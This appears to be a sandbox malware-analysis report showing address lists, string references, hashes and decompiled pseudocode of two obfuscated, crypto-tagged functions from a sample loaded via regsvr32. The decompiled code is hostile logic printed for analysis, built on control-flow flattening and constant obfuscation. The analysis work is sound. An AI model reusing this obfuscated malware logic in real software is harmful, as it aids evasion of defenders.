0x003d25a1
0x003d25a9
0x003d25ae
0x003d25b3
0x003d25bb
0x003d25c3
0x003d25cb
0x003d25d3
0x003d25ef
0x003d1e34
0x003d1e3a
0x003d2021
0x003d202b
0x003d2030
0x003d2038
0x003d2040
0x003d2048
0x003d2050
0x003d2058
0x003d2060
0x003d2068
0x003d206d
0x003d2075
0x003d2083
0x003d2086
0x003d208f
0x003d2093
0x003d209b
0x003d20b8
0x003d20bd
0x003d20c7
0x003d20d2
0x003d20da
0x003d20e2
0x003d20ea
0x003d20ef
0x003d20f7
0x003d20ff
0x003d2107
0x003d210f
0x003d2117
0x003d211f
0x003d2124
0x003d212c
0x003d2139
0x003d213d
0x003d2145
0x003d214d
0x003d2155
0x003d215d
0x003d2165
0x003d2172
0x003d217a
0x003d2182
0x003d218a
0x003d2192
0x003d219a
0x003d21a2
0x003d21aa
0x003d21b2
0x003d21ba
0x003d21c2
0x003d21f3
0x003d21f8
0x003d220c
0x003d2215
0x003d2219
0x003d221e
0x003d2226
0x003d222e
0x003d2236
0x003d2240
0x003d2244
0x003d224c
0x003d2254
0x003d2259
0x003d226d
0x003d2272
0x003d2544
0x003d2544
0x00000000
0x003d1e40
0x003d1e46
0x003d1ffe
0x003d2004
0x003d200f
0x003d200c
0x003d200c
0x003d2014
0x003d2017
0x003d1e0b
0x003d1e0b
0x003d1e0b
0x00000000
0x003d1e0b
0x003d1e4c
0x003d1e4e
0x00000000
0x003d1e54
0x003d1e54
0x003d1e60
0x003d1e65
0x003d1e6a
0x003d1e72
0x003d1e7a
0x003d1e7f
0x003d1e87
0x003d1e8f
0x003d1e94
0x003d1e9c
0x003d1ea4
0x003d1eac
0x003d1eb4
0x003d1ebc
0x003d1ec4
0x003d1ecc
0x003d1ee1
0x003d1ef0
0x003d1efa
0x003d1efe
0x003d1f03
0x003d1f08
0x003d1f10
0x003d1f18
0x003d1f1d
0x003d1f25
0x003d1f2d
0x003d1f3b
0x003d1f40
0x003d1f46
0x003d1f4b
0x003d1f53
0x003d1f5b
0x003d1f63
0x003d1f6b
0x003d1f77
0x003d1f7c
0x003d1f82
0x003d1f87
0x003d1f8f
0x003d1f97
0x003d1fa3
0x003d1fa6
0x003d1fae
0x003d1fb3
0x003d1fb8
0x003d1fe1
0x003d1fe8
0x003d1fed
0x003d1ff5
0x003d1e0b
0x003d1e0b
0x003d1e0b
0x00000000
0x003d1e0b
0x003d1e0b
0x003d1e4e
0x003d1e46
0x003d1e3a
0x003d1e2e
0x003d1e22
0x003d25f7
0x003d2605
0x003d2549
0x003d2549
0x00000000
0x003d2555

Strings

L&A, xrefs: 003D23B7
1F, xrefs: 003D1E9C
r, xrefs: 003D24A6
5R, xrefs: 003D24CB
,f%5, xrefs: 003D2093
*A, xrefs: 003D2395
5Q, xrefs: 003D2374
K, xrefs: 003D2571
#H2, xrefs: 003D2155

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #H2$*A$,f%5$1F$5R$K$L&A$r$5Q
API String ID: 0-2240756758
Opcode ID: 069314323df993adbceae307303f08e27efd24ab61db19856bddccbb96de8409
Instruction ID: 628cdb74c8cf2cb2f2f1c60339dfbd0496a192625f2982a7742f04d74903e223
Opcode Fuzzy Hash: 069314323df993adbceae307303f08e27efd24ab61db19856bddccbb96de8409
Instruction Fuzzy Hash: F5220EB11083829FC359CF21D58A80BBBE1FBD9758F104A1EF19696260D3B5CA59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 003DB605 Relevance: 10.5, Strings: 8, Instructions: 458
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003DB605(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				signed int _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _t469;
				signed int _t479;
				short* _t490;
				void* _t500;
				signed int _t511;
				void* _t536;
				void* _t539;
				signed int _t541;
				signed int _t546;
				signed int _t556;
				signed int _t559;
				signed int _t561;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t568;
				void* _t569;
				signed int _t605;
				signed int _t607;
				signed int* _t617;

				_t617 =  &_v1604;
				_v1584 = _v1584 & 0x00000000;
				_t469 = 0xae587;
				_t607 = _v1584;
				_t536 = __ecx;
				_v1588 = 0xb1f8f;
				while(1) {
					L1:
					_t539 = 0xa6138;
					while(1) {
						L2:
						_t569 = 0x1368f;
						do {
							L3:
							while(_t469 != 0x10de4) {
								if(_t469 == _t569) {
									_v1588 = 0x5e7308;
									_v1588 = _v1588 << 0xa;
									_v1588 = _v1588 ^ 0x79ccb212;
									_v1596 = 0x646a9c;
									_push(_t539);
									_v1596 = _v1596 * 0x62;
									_v1596 = _v1596 << 5;
									_v1596 = _v1596 ^ 0xce108a09;
									_v1592 = 0xc23540;
									_v1592 = _v1592 >> 0xc;
									_v1592 = _v1592 ^ 0x0004543f;
									_v1600 = 0xb9e50d;
									_v1600 = _v1600 << 0xc;
									_v1600 = _v1600 + 0xffff1b6e;
									_v1600 = _v1600 + 0xcd2a;
									_v1600 = _v1600 ^ 0x9e56fc6c;
									_v1604 = 0x5d2cc8;
									_v1604 = _v1604 + 0xc84f;
									_v1604 = _v1604 | 0xdfe26285;
									_v1604 = _v1604 ^ 0x5b6de2fb;
									_v1604 = _v1604 ^ 0x849a1db0;
									_push(_v1604);
									_t479 = E003DA455(_v1588, _v1596,  &_v1564, _v1592, _v1600, _t539, _v1584,  &_v1580);
									_t617 =  &(_t617[8]);
									__eflags = _t479;
									if(__eflags != 0) {
										_v1600 = 0xd54932;
										_v1600 = _v1600 + 0x9063;
										_t541 = 0x4e;
										_v1600 = _v1600 / _t541;
										_v1600 = _v1600 << 2;
										_v1600 = _v1600 ^ 0x000e16a6;
										_v1604 = 0x2d6b1;
										_v1604 = _v1604 << 5;
										_v1604 = _v1604 * 0x2f;
										_v1604 = _v1604 << 0xa;
										_v1604 = _v1604 ^ 0xb53d9129;
										E003D4FB8(_v1580, _v1600, _v1604);
										_v1600 = 0xaee2e6;
										_v1600 = _v1600 >> 6;
										_v1600 = _v1600 | 0x1f182750;
										_v1600 = _v1600 + 0x6e86;
										_v1600 = _v1600 ^ 0x1f105b7d;
										_v1604 = 0x6a2b71;
										_v1604 = _v1604 << 8;
										_v1604 = _v1604 * 0x48;
										_v1604 = _v1604 << 3;
										_v1604 = _v1604 ^ 0xe1b6299e;
										E003D4FB8(_v1576, _v1600, _v1604);
									}
									L13:
									_t469 = 0x9e5bf;
									while(1) {
										L1:
										_t539 = 0xa6138;
										L2:
										_t569 = 0x1368f;
										goto L3;
									}
								}
								if(_t469 == 0x7315e) {
									_v1592 = 0x77456c;
									_v1592 = _v1592 + 0x712d;
									_v1592 = _v1592 ^ 0x007715f4;
									_v1600 = 0x5d6c7b;
									_t43 =  &_v1600; // 0x5d6c7b
									_t546 = 0x6b;
									_v1600 =  *_t43 / _t546;
									_v1600 = _v1600 + 0x2233;
									_v1600 = _v1600 + 0xc491;
									_v1600 = _v1600 ^ 0x000e1480;
									_v1596 = 0x3fd4d7;
									_v1596 = _v1596 + 0xffffefc8;
									_v1596 = _v1596 ^ 0x4656c35a;
									_v1596 = _v1596 | 0x868c3d58;
									_v1596 = _v1596 ^ 0xc6e19fd8;
									E003C2493(_t546,  &_v1044, _v1592, _v1600, _v1596);
									_v1600 = 0x528a7;
									_v1600 = _v1600 * 0x33;
									_v1600 = _v1600 << 3;
									_v1600 = _v1600 ^ 0x083c084a;
									_v1604 = 0x4e6849;
									_v1604 = _v1604 ^ 0xc657cb90;
									_v1604 = _v1604 << 5;
									_v1604 = _v1604 ^ 0xc33846a0;
									_v1592 = 0xc56945;
									_v1592 = _v1592 >> 8;
									_v1592 = _v1592 ^ 0x000b0d97;
									_t490 = E003D7C07( &_v1044, _v1600, _v1604, _v1592);
									_push(0x3c);
									 *_t490 = 0;
									_v1604 = 0x8a1513;
									_v1604 = _v1604 ^ 0x0f9b7297;
									_push(0x19);
									_v1604 = _v1604 / 0;
									_push(0x1d);
									_v1604 = _v1604 / 0;
									_v1604 = _v1604 ^ 0x00034acf;
									_v1596 = 0x29dd7f;
									_v1596 = _v1596 >> 0xc;
									_v1596 = _v1596 << 1;
									_v1596 = _v1596 / 0;
									_v1596 = _v1596 ^ 0x0008c7e4;
									_v1600 = 0x9b5d49;
									_v1600 = _v1600 | 0xc0425b3a;
									_v1600 = _v1600 ^ 0x5afd0ccc;
									_v1600 = _v1600 * 0x24;
									_v1600 = _v1600 ^ 0xad65ee15;
									E003C4E03( &_v524, _v1604, __eflags, _v1596, _v1600);
									_v1596 = 0x55625f;
									_v1596 = _v1596 << 8;
									_v1596 = _v1596 << 0xb;
									_v1596 = _v1596 ^ 0x12feb630;
									_v1592 = 0x8b954a;
									_v1592 = _v1592 * 0x5e;
									_v1592 = _v1592 ^ 0x3349aa1e;
									_v1604 = 0x5c7868;
									_v1604 = _v1604 ^ 0x95aa8157;
									_v1604 = _v1604 | 0xc555f61d;
									_v1604 = _v1604 + 0x921e;
									_v1604 = _v1604 ^ 0xd5fef796;
									_v1600 = 0x97268b;
									_v1600 = _v1600 | 0xe0301d0b;
									_v1600 = _v1600 + 0xffff37b3;
									_v1600 = _v1600 ^ 0xe0bfdc5b;
									_t500 = E003CD933(_v1596, _v1592, 0x3c1128, _v1604, _v1600);
									_v1596 = 0xd0ba04;
									_v1596 = _v1596 << 0xb;
									_v1596 = _v1596 ^ 0x85dcf132;
									_v1600 = 0xbe5277;
									_v1600 = _v1600 + 0xffff1aef;
									_v1600 = _v1600 * 0x30;
									_v1600 = _v1600 ^ 0x23865376;
									_v1592 = 0xaad593;
									_v1592 = _v1592 ^ 0x5b4f1cb9;
									_v1592 = _v1592 ^ 0x5be08331;
									_v1604 = 0xc5e6b5;
									_v1604 = _v1604 ^ 0xc2e452b2;
									_v1604 = _v1604 * 0xa;
									_v1604 = _v1604 ^ 0x9558dc86;
									E003D0E90( &_v1044, __eflags, _v1600 * 0x30, _v1600, _v1592,  &_v524,  &_v1564, _v1604, _t500);
									_v1600 = 0x9dd191;
									_v1600 = _v1600 + 0xffffa189;
									_v1600 = _v1600 | 0xde0c70df;
									_t556 = 0x7e;
									_v1600 = _v1600 / _t556;
									_v1600 = _v1600 ^ 0x01cc1e73;
									_v1604 = 0xca5314;
									_v1604 = _v1604 << 0xf;
									_v1604 = _v1604 * 0x15;
									_v1604 = _v1604 * 0x24;
									_v1604 = _v1604 ^ 0xab84a250;
									_v1596 = 0x43632c;
									_v1596 = _v1596 >> 0xf;
									_v1596 = _v1596 + 0x872d;
									_v1596 = _v1596 ^ 0x0002607c;
									E003C43D3(_v1600, _v1604, _v1596, _t500);
									_v1600 = 0x4c4fdf;
									_v1600 = _v1600 + 0xffffef74;
									_v1600 = _v1600 << 5;
									_v1600 = _v1600 ^ 0x0989e2f7;
									_v1604 = 0x5684cf;
									_v1604 = _v1604 >> 5;
									_v1604 = _v1604 * 0x48;
									_v1604 = _v1604 ^ 0x00c09b9e;
									_t511 = E003C89F6( &_v1564, _t536, _v1604);
									_t617 =  &(_t617[0x15]);
									__eflags = _t511;
									if(__eflags != 0) {
										_t539 = 0xa6138;
										__eflags = _t607 - 0xa6138;
										_t569 = 0x1368f;
										_t469 =  ==  ? 0x1368f : 0x81fac;
										continue;
									}
									goto L13;
								}
								if(_t469 == 0x81fac) {
									_v1588 = 0x2cc1d6;
									_v1588 = _v1588 + 0xffffadd4;
									_v1588 = _v1588 ^ 0x0028e12f;
									_v1604 = 0x99aa8d;
									_t559 = 0x65;
									_push(_t559);
									_v1604 = _v1604 / _t559;
									_v1604 = _v1604 + 0x713c;
									_v1604 = _v1604 + 0x1c65;
									_v1604 = _v1604 ^ 0x00096f7e;
									_v1596 = 0xdea879;
									_v1596 = _v1596 * 0x42;
									_v1596 = _v1596 << 5;
									_v1596 = _v1596 ^ 0x2ce41b1d;
									_v1600 = 0xf595ba;
									_v1600 = _v1600 + 0xffffa2eb;
									_v1600 = _v1600 | 0xf397c7c7;
									_v1600 = _v1600 ^ 0xf3f6bde2;
									_t469 = E003D8BA1(_v1588, _v1604, __eflags, 0,  &_v1580, _v1596, 0,  &_v1564, _v1600);
									__eflags = _t469;
									if(_t469 == 0) {
										L27:
										return _t469;
									}
									_v1588 = 0xf4fb7a;
									_v1588 = _v1588 >> 2;
									_v1588 = _v1588 ^ 0x003e1477;
									_v1604 = 0x61bd87;
									_t561 = 0x54;
									_v1604 = _v1604 / _t561;
									_v1604 = _v1604 >> 9;
									_v1604 = _v1604 * 0x6f;
									_v1604 = _v1604 ^ 0x0008f14b;
									E003D4FB8(_v1580, _v1588, _v1604);
									_v1604 = 0x3140c5;
									_t564 = 0x18;
									_v1604 = _v1604 / _t564;
									_t565 = 0x1c;
									_v1604 = _v1604 / _t565;
									_v1604 = _v1604 ^ 0x000e6693;
									_v1588 = 0x3e1a41;
									_v1588 = _v1588 * 0x14;
									_t464 =  &_v1588;
									 *_t464 = _v1588 ^ 0x04dba340;
									__eflags =  *_t464;
									_push(_v1588);
									_t605 = _v1604;
									_t566 = _v1576;
									L26:
									_t469 = E003D4FB8(_t566, _t605);
									goto L27;
								}
								if(_t469 == 0x9e5bf) {
									_v1592 = 0xd1414;
									_v1592 = _v1592 ^ 0x8bd21399;
									_v1592 = _v1592 ^ 0x8bd0ded0;
									_v1588 = 0x6f708c;
									_v1588 = _v1588 + 0xffff8fe9;
									_v1588 = _v1588 ^ 0x006e1f67;
									_push(_v1588);
									_t605 = _v1592;
									_t566 = _v1584;
									goto L26;
								}
								if(_t469 == 0xae587) {
									_t469 = 0xbcd2e;
									continue;
								}
								if(_t469 != 0xbcd2e) {
									goto L21;
								}
								_v1596 = 0x8591fc;
								_v1596 = _v1596 + 0xa1c8;
								_v1596 = _v1596 << 0x10;
								_v1596 = _v1596 * 0x21;
								_v1596 = _v1596 ^ 0xac462757;
								_v1604 = 0xeeaf69;
								_v1604 = _v1604 << 0x10;
								_v1604 = _v1604 * 0x65;
								_v1604 = _v1604 ^ 0x3465fbef;
								_v1600 = 0xdff0ee;
								_v1600 = _v1600 ^ 0xb3d13316;
								_v1600 = _v1600 << 4;
								_v1600 = _v1600 ^ 0x30eb8d75;
								_v1592 = 0x7213bf;
								_v1592 = _v1592 << 8;
								_v1592 = _v1592 ^ 0x721dc46a;
								E003C2BF3();
								E003D80D4(_t539);
								_t539 = 0xa6138;
								_t469 = 0x10de4;
								_t607 =  !=  ? 0xa6138 : 0x2166d;
								goto L2;
							}
							__eflags = _t607 - _t539;
							if(_t607 != _t539) {
								_t469 = 0x7315e;
								goto L21;
							}
							_v1604 = 0x7c7337;
							_v1604 = _v1604 >> 1;
							_v1604 = _v1604 + 0xffffa99f;
							_t568 = 0xd;
							_v1604 = _v1604 * 0x48;
							_v1604 = _v1604 ^ 0x1367e850;
							_v1596 = 0xcc743f;
							_v1596 = _v1596 / _t568;
							_v1596 = _v1596 | 0x3f260c03;
							_v1596 = _v1596 ^ 0x3f2ea25e;
							_v1600 = 0x8365e7;
							_v1600 = _v1600 * 0x1f;
							_v1600 = _v1600 * 0x4b;
							_v1600 = _v1600 + 0xffffe347;
							_v1600 = _v1600 ^ 0xa953a1b8;
							_v1588 = 0xe57807;
							_v1588 = _v1588 << 0xe;
							_v1588 = _v1588 ^ 0x5e055e29;
							_push( &_v1584);
							_t469 = E003CC388(_v1596, _t568, _v1600, _v1604, _v1588);
							_t617 =  &(_t617[5]);
							__eflags = _t469;
							if(__eflags == 0) {
								goto L27;
							}
							_t469 = 0x7315e;
							goto L1;
							L21:
							__eflags = _t469 - 0xb9bf;
						} while (__eflags != 0);
						goto L27;
					}
				}
			}

0x003db605
0x003db60b
0x003db610
0x003db619
0x003db61d
0x003db61f
0x003db62c
0x003db62c
0x003db62c
0x003db631
0x003db631
0x003db631
0x003db636
0x00000000
0x003db636
0x003db643
0x003dbafb
0x003dbb03
0x003dbb08
0x003dbb10
0x003dbb1d
0x003dbb1e
0x003dbb26
0x003dbb2b
0x003dbb33
0x003dbb3b
0x003dbb40
0x003dbb48
0x003dbb50
0x003dbb55
0x003dbb5d
0x003dbb65
0x003dbb6d
0x003dbb75
0x003dbb7d
0x003dbb85
0x003dbb8d
0x003dbb95
0x003dbbb4
0x003dbbb9
0x003dbbbc
0x003dbbbe
0x003dbbc4
0x003dbbce
0x003dbbdc
0x003dbbdf
0x003dbbe3
0x003dbbe8
0x003dbbf0
0x003dbbf8
0x003dbc02
0x003dbc06
0x003dbc0b
0x003dbc1f
0x003dbc24
0x003dbc2c
0x003dbc31
0x003dbc39
0x003dbc41
0x003dbc49
0x003dbc51
0x003dbc5c
0x003dbc60
0x003dbc65
0x003dbc79
0x003dbc7e
0x003dbad8
0x003dbad8
0x003db62c
0x003db62c
0x003db62c
0x003db631
0x003db631
0x00000000
0x003db631
0x003db62c
0x003db64b
0x003db732
0x003db73c
0x003db744
0x003db74c
0x003db754
0x003db75a
0x003db764
0x003db768
0x003db770
0x003db778
0x003db780
0x003db788
0x003db790
0x003db798
0x003db7a0
0x003db7b4
0x003db7b9
0x003db7d0
0x003db7d4
0x003db7d9
0x003db7e1
0x003db7e9
0x003db7f1
0x003db7f6
0x003db7fe
0x003db806
0x003db80b
0x003db81f
0x003db828
0x003db82a
0x003db82d
0x003db835
0x003db844
0x003db846
0x003db853
0x003db855
0x003db85b
0x003db863
0x003db86b
0x003db870
0x003db882
0x003db886
0x003db88e
0x003db896
0x003db89e
0x003db8ab
0x003db8af
0x003db8c3
0x003db8c8
0x003db8d0
0x003db8d5
0x003db8da
0x003db8e2
0x003db8ef
0x003db8f3
0x003db8fb
0x003db903
0x003db90b
0x003db913
0x003db91b
0x003db923
0x003db92b
0x003db933
0x003db93b
0x003db958
0x003db95d
0x003db96c
0x003db973
0x003db97e
0x003db986
0x003db994
0x003db998
0x003db9a0
0x003db9a8
0x003db9b0
0x003db9b8
0x003db9c0
0x003db9cd
0x003db9d5
0x003db9f7
0x003db9fc
0x003dba07
0x003dba11
0x003dba1f
0x003dba23
0x003dba27
0x003dba2f
0x003dba37
0x003dba41
0x003dba4a
0x003dba4e
0x003dba56
0x003dba5e
0x003dba63
0x003dba6b
0x003dba7f
0x003dba84
0x003dba8c
0x003dba94
0x003dba99
0x003dbaa5
0x003dbaad
0x003dbab7
0x003dbabb
0x003dbacc
0x003dbad1
0x003dbad4
0x003dbad6
0x003dbae2
0x003dbaec
0x003dbaee
0x003dbaf3
0x00000000
0x003dbaf3
0x00000000
0x003dbad6
0x003db656
0x003dbd97
0x003dbda1
0x003dbda9
0x003dbdb1
0x003dbdbf
0x003dbdc2
0x003dbdc3
0x003dbdc7
0x003dbdcf
0x003dbdd7
0x003dbddf
0x003dbdec
0x003dbdf4
0x003dbdf9
0x003dbe01
0x003dbe09
0x003dbe11
0x003dbe19
0x003dbe3b
0x003dbe43
0x003dbe45
0x003dbef8
0x003dbf02
0x003dbf02
0x003dbe4b
0x003dbe55
0x003dbe5a
0x003dbe62
0x003dbe70
0x003dbe73
0x003dbe77
0x003dbe81
0x003dbe85
0x003dbe99
0x003dbe9e
0x003dbeaf
0x003dbeb4
0x003dbebe
0x003dbec1
0x003dbec5
0x003dbecd
0x003dbeda
0x003dbede
0x003dbede
0x003dbede
0x003dbee6
0x003dbeea
0x003dbeee
0x003dbef2
0x003dbef2
0x00000000
0x003dbef7
0x003db661
0x003dbd56
0x003dbd5e
0x003dbd66
0x003dbd6e
0x003dbd76
0x003dbd7e
0x003dbd86
0x003dbd8a
0x003dbd8e
0x00000000
0x003dbd8e
0x003db66c
0x003db728
0x00000000
0x003db728
0x003db677
0x00000000
0x00000000
0x003db67d
0x003db685
0x003db68d
0x003db697
0x003db69b
0x003db6a3
0x003db6ab
0x003db6b5
0x003db6b9
0x003db6c1
0x003db6c9
0x003db6d1
0x003db6d6
0x003db6de
0x003db6e6
0x003db6eb
0x003db703
0x003db70a
0x003db716
0x003db71b
0x003db720
0x00000000
0x003db720
0x003dbc84
0x003dbc86
0x003dbd44
0x00000000
0x003dbd44
0x003dbc8c
0x003dbc96
0x003dbc9a
0x003dbca9
0x003dbcaa
0x003dbcae
0x003dbcb6
0x003dbcc4
0x003dbcc8
0x003dbcd0
0x003dbcd8
0x003dbce5
0x003dbcee
0x003dbcf6
0x003dbcfe
0x003dbd06
0x003dbd0e
0x003dbd13
0x003dbd1b
0x003dbd2d
0x003dbd32
0x003dbd35
0x003dbd37
0x00000000
0x00000000
0x003dbd3d
0x00000000
0x003dbd46
0x003dbd46
0x003dbd46
0x00000000
0x003dbd51
0x003db631

Strings

{l], xrefs: 003DB754
8a, xrefs: 003DB716
_bU, xrefs: 003DB8C8
/(, xrefs: 003DBDA9
8a, xrefs: 003DBAE2
,cC, xrefs: 003DBA56
8a, xrefs: 003DB62C
7s|, xrefs: 003DBC8C

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: ,cC$/($7s|$8a$8a$8a$_bU${l]
API String ID: 2962429428-813388844
Opcode ID: e5d6a229e7dd70622c3731e4cff02739e70886e89546d0982ace9a18a04b3753
Instruction ID: 5a89118beb9ccc93eaadb808754a1d9d91b003e35104084140231bdcb883bf83
Opcode Fuzzy Hash: e5d6a229e7dd70622c3731e4cff02739e70886e89546d0982ace9a18a04b3753
Instruction Fuzzy Hash: 4C32EEB25083428FC349CF25E54980BBBE1BBD8748F104A1EF1D5AA261D7B4DA49CF97

Uniqueness

Uniqueness Score: -1.00%

Function 003C1B3F Relevance: 10.2, Strings: 8, Instructions: 222
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003C1B3F() {
				signed int _v4;
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t211;
				void* _t214;
				void* _t220;
				intOrPtr _t236;
				intOrPtr* _t237;
				void* _t238;
				signed int _t239;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				void* _t266;
				signed int* _t270;

				_t270 =  &_v48;
				_v16 = 0x4d95b;
				_v4 = 0;
				_t235 = _v4;
				_t266 = 0xbeed2;
				_v12 = 0xeb77;
				while(1) {
					L1:
					_t238 = 0x5c;
					_t211 = 0x93a16;
					do {
						while(_t266 != 0x56e8) {
							if(_t266 == _t211) {
								_v24 = 0xadd914;
								_v24 = _v24 + 0x6e76;
								_t239 = 0x2b;
								_v24 = _v24 / _t239;
								_v24 = _v24 ^ 0x0008c724;
								_v16 = 0x662ea6;
								_v16 = _v16 + 0x6cba;
								_v16 = _v16 ^ 0x00618a71;
								_t214 = E003CE920(_t235, _v24, _v8, _v16);
								_t266 = 0x959d6;
								_v4 = 0 | _t214 == 0x00000000;
								goto L1;
							} else {
								if(_t266 == 0x959d6) {
									_v20 = 0xc30ea9;
									_v20 = _v20 >> 7;
									_v20 = _v20 ^ 0x0002d6b6;
									_v48 = 0x4ce698;
									_v48 = _v48 + 0x57f6;
									_v48 = _v48 >> 0x10;
									_v48 = _v48 << 8;
									_v48 = _v48 ^ 0x00006e32;
									_v16 = 0x7b5b80;
									_v16 = _v16 | 0xf507d375;
									_v16 = _v16 ^ 0xf57184d3;
									_v44 = 0xfab0a4;
									_v44 = _v44 + 0xffffce05;
									_v44 = _v44 | 0x819afef7;
									_v44 = _v44 * 0xb;
									_v44 = _v44 ^ 0x95c4744a;
									E003D8401(_v20, _v48, _v16, _v44, _v8);
								} else {
									if(_t266 == 0xbeed2) {
										_t266 = 0x56e8;
										continue;
									} else {
										if(_t266 == 0xe60a2) {
											_v40 = 0xb69ae0;
											_v40 = _v40 + 0xae72;
											_v40 = _v40 * 0x7a;
											_v40 = _v40 ^ 0x575ed045;
											_v48 = 0x5a925b;
											_v48 = _v48 + 0xffff2cc1;
											_v48 = _v48 * 0x32;
											_v48 = _v48 | 0x0ca82d0c;
											_v48 = _v48 ^ 0x1da4a8fd;
											_v24 = 0xf68038;
											_v24 = _v24 << 0x10;
											_v24 = _v24 ^ 0x803de52e;
											_v44 = 0x84e4d2;
											_v44 = _v44 ^ 0x071be837;
											_v44 = _v44 ^ 0x58042ea7;
											_v44 = _v44 ^ 0x5f94dbdc;
											_t220 = E003CD933(_v40, _v48, 0x3c1050, _v24, _v44);
											_v48 = 0x8b4a33;
											_v48 = _v48 ^ 0x30d5a6a7;
											_t247 = 0x78;
											_v48 = _v48 / _t247;
											_v48 = _v48 | 0x303b3e02;
											_v48 = _v48 ^ 0xb07f3ee6;
											_v40 = 0x536d88;
											_v40 = _v40 + 0xffff3fbc;
											_v40 = _v40 | 0x63e18386;
											_v40 = _v40 ^ 0x63f3afc4;
											_v16 = 0x27221d;
											_v16 = _v16 | 0xde397570;
											_v16 = _v16 ^ 0xde3ba605;
											_v20 = 0x217dfc;
											_v20 = _v20 << 1;
											_v20 = _v20 ^ 0x0049246f;
											_v44 = 0xf8f5ce;
											_v44 = _v44 ^ 0x8388a005;
											_v44 = _v44 >> 8;
											_t248 = 0x7d;
											_v44 = _v44 * 0x5e;
											_v44 = _v44 ^ 0x304f3d3e;
											_v24 = 0x25d7d4;
											_v24 = _v24 + 0xffff1127;
											_v24 = _v24 >> 1;
											_v24 = _v24 ^ 0x001edfd7;
											_v28 = 0x5c6c3a;
											_v28 = _v28 << 3;
											_v28 = _v28 * 0x74;
											_v28 = _v28 ^ 0x4f0343b0;
											_v32 = 0x5b4c76;
											_v32 = _v32 + 0x1e3d;
											_v32 = _v32 << 4;
											_v32 = _v32 ^ 0x05bc331d;
											_v36 = 0xe6f0f4;
											_v36 = _v36 / _t248;
											_v36 = _v36 + 0xffffeebe;
											_v36 = _v36 ^ 0x000d20dc;
											E003D98FB(_v16, _t248, _t248, _v20,  &_v8, _v44, _v48, _v24, _t220, _v28, _v32, _t248, _v36, _v40);
											_v48 = 0x61d00f;
											_t266 =  ==  ? 0x93a16 : 0xc4394;
											_t249 = 0x3b;
											_v48 = _v48 / _t249;
											_t250 = 0x35;
											_v48 = _v48 / _t250;
											_v48 = _v48 + 0xfffff2a9;
											_v48 = _v48 ^ 0xfff86059;
											_v44 = 0x9c6cbe;
											_v44 = _v44 + 0x5c79;
											_v44 = _v44 ^ 0x2d87ce7f;
											_v44 = _v44 >> 0x10;
											_v44 = _v44 ^ 0x0006e551;
											_v24 = 0x9c6bbc;
											_v24 = _v24 ^ 0xe1e1c628;
											_v24 = _v24 ^ 0xc49516c0;
											_v24 = _v24 ^ 0x25e40155;
											E003C43D3(_v48, _v44, _v24, _t220);
											_t270 =  &(_t270[0x13]);
											_t238 = 0x5c;
											L14:
											_t211 = 0x93a16;
										}
										goto L15;
									}
								}
							}
							L18:
							return _v4;
						}
						_t236 =  *0x3e2208; // 0x28e510
						_t237 = _t236 + 0x22c;
						while( *_t237 != _t238) {
							_t237 = _t237 + 2;
						}
						_t235 = _t237 + 2;
						_t266 = 0xe60a2;
						goto L14;
						L15:
					} while (_t266 != 0xc4394);
					goto L18;
				}
			}

0x003c1b3f
0x003c1b46
0x003c1b4f
0x003c1b58
0x003c1b5d
0x003c1b62
0x003c1b6a
0x003c1b6a
0x003c1b6c
0x003c1b6d
0x003c1b72
0x003c1b72
0x003c1b7c
0x003c1e43
0x003c1e4d
0x003c1e5b
0x003c1e60
0x003c1e64
0x003c1e6c
0x003c1e74
0x003c1e7c
0x003c1e90
0x003c1e99
0x003c1ea3
0x00000000
0x003c1b82
0x003c1b88
0x003c1ee0
0x003c1ee8
0x003c1eed
0x003c1ef5
0x003c1efd
0x003c1f05
0x003c1f0a
0x003c1f0f
0x003c1f17
0x003c1f1f
0x003c1f27
0x003c1f2f
0x003c1f37
0x003c1f3f
0x003c1f4c
0x003c1f50
0x003c1f6c
0x003c1b8e
0x003c1b94
0x003c1e3c
0x00000000
0x003c1b9a
0x003c1ba0
0x003c1ba6
0x003c1bae
0x003c1bbb
0x003c1bbf
0x003c1bc7
0x003c1bcf
0x003c1bdc
0x003c1be0
0x003c1be8
0x003c1bf0
0x003c1bf8
0x003c1bfd
0x003c1c05
0x003c1c0d
0x003c1c15
0x003c1c1d
0x003c1c3a
0x003c1c3f
0x003c1c4a
0x003c1c5c
0x003c1c61
0x003c1c67
0x003c1c6f
0x003c1c77
0x003c1c7f
0x003c1c87
0x003c1c8f
0x003c1c97
0x003c1c9f
0x003c1ca7
0x003c1caf
0x003c1cb7
0x003c1cbb
0x003c1cc3
0x003c1ccb
0x003c1cd3
0x003c1cdd
0x003c1cde
0x003c1ce2
0x003c1cea
0x003c1cf2
0x003c1cfa
0x003c1cfe
0x003c1d06
0x003c1d0e
0x003c1d18
0x003c1d1c
0x003c1d24
0x003c1d2c
0x003c1d34
0x003c1d39
0x003c1d41
0x003c1d4f
0x003c1d53
0x003c1d5b
0x003c1d90
0x003c1d95
0x003c1dab
